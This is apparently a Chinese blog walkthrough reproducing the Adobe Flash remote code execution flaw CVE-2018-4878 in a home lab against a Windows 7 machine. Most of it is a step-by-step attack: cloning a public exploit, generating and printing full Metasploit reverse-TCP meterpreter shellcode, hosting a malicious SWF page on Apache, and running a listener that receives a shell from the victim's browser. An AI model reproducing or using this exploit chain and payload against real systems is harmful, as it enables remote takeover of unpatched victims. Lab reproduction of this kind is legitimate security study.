CVE-2018-4878复现

漏洞概述

2018 年 2 月 1 号，Adobe 官方发布安全通报（APSA18-01），声明 Adobe Flash 28.0.0.137 及其之前的版本，存在高危漏洞（CVE-2018-4878）。

攻击者通过构造特殊的 Flash 链接，当用户用浏览器/邮件/Office访问此 Flash 链接时，会被“远程代码执行”，并且直接被 getshell。

直到 2018 年 2 月 5 号，Adboe 才发布补丁来修复此 0 day 漏洞。

环境准备

攻击者

操作系统： kali

Metasploit： v5.0.62-dev

IP： 192.168.150.142

EXP：https://github.com/anbai-inc/CVE-2018-4878.git

受害者（靶机）

操作系统： windows 7 sp1 x86

Flash Player 版本： flashplayer27_0r0_187_win

IP： 192.168.150.132

漏洞复现

在靶机上下载并安装 flash player

https://helpx.adobe.com/tw/flash-player/kb/archived-flash-player-versions.html

克隆配置 EXP 文件

1	root@kali:~/CVE # git clone https://github.com/anbai-inc/CVE-2018-4878.git && cd Office8570

生成 shellcode,并复制

root@kali:~/CVE/CVE-2018-4878 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.142 LPORT=6666 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of py file: 1672 bytes
buf =  b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x96\x8e\x68\x02"
buf += b"\x00\x1a\x0a\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += b"\x53\xff\xd5"

修改 cve-2018-4878.py

将原来的 shellcode 替换为刚才生成的代码；把 stageless 改为 “ False “；修改文件生成路径

执行脚本文件，开启 apache 服务，并将生成的 “index2.html” 和 “exploit.swf” 复制到 /var/www/html

1 2	root@kali:~/CVE # cp exploit.swf index2.html /var/www/html/ root@kali:~/CVE # systemctl start apache2

开启 metasploit

root@kali:/var/www/html# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter
msf5 exploit(multi/handler) > set lhost 192.168.150.142
lhost => 192.168.150.142
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.150.142:6666

win7 使用 firefox 打开 192.168.150.142/index2.html，并运行 flash

这时渗透机直接获取到Sessions

reference

[漏洞复现] CVE-2018-4878 Flash 0day